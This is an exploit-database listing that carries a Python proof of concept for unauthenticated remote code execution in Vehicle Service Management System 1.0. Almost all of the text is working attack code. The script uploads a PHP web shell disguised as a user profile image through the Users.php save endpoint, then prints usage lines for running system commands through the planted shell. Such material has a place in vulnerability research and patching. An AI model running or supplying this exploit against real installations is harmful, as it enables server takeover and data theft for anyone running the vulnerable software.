Exploit for Vehicle Service Managment System 1.0 Shell Upload

Name: Exploit for Vehicle Service Managment System 1.0 Shell Upload
Rating: 5 (199 reviews)
2021-10-04 | CVSS -0.4
## https://sploitus.com/exploit?id=PACKETSTORM:164370
# Exploit Title: Vehicle Service Managment 1.0 - RCE (Unauthenticated)   
# Date: 2021-10-02  
# Exploit Author: RICHARD JONES  
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code  
# Version: v1.0  
# Tested on: Windows 10  
  
import requests  
  
HOST="http://localhost"  
UPLOAD_URL="/vehicle_service/classes/Users.php?f=save"  
  
s = requests.Session()  
  
def sendShell():  
payload = "<?php system($_GET['c']);?>"  
  
data = {  
"id":"1",  
"firstname":"Adminstrator",  
"lastname":"fake",  
"username":"fake",  
"password":"fake"   
}  
  
filedata = {"img":("shell.php",payload,   
"image/png", {"Content-Disposition": "form-data"}  
) }  
  
prox = {"http":"http://127.0.0.1:8080"}  
  
r = s.post(f"{HOST}{UPLOAD_URL}", data=data, proxies=prox, files=filedata)  
if (r.status_code == 200):  
print("[+] Shell upload successful")  
print(f"[-] Check in {HOST}/vehicle_service/uploads/ for the shell")  
print(f"[-] Usage: *shell.php?c=id")  
print("[-] Ie: http://localhost/vehicle_service/uploads/{SERVERTIME}_shell.php?c=whoami")  
  
def banner():  
return r"""  
__ _______ __ __ __ ___   
\ \ / / ____| \/ | /_ | / _ \   
\ \ / / (___ | \ / | | || | | |  
\ \/ / \___ \| |\/| | | || | | |  
\ / ____) | | | | | || |_| |  
\/ |_____/|_| |_| |_(_)___/   
  
"""  
  
print(banner())  
print("Vehicle Service Managment 1.0 RCE ~ Created by Richard Jones")  
print("[+] Trying shell upload")   
sendShell()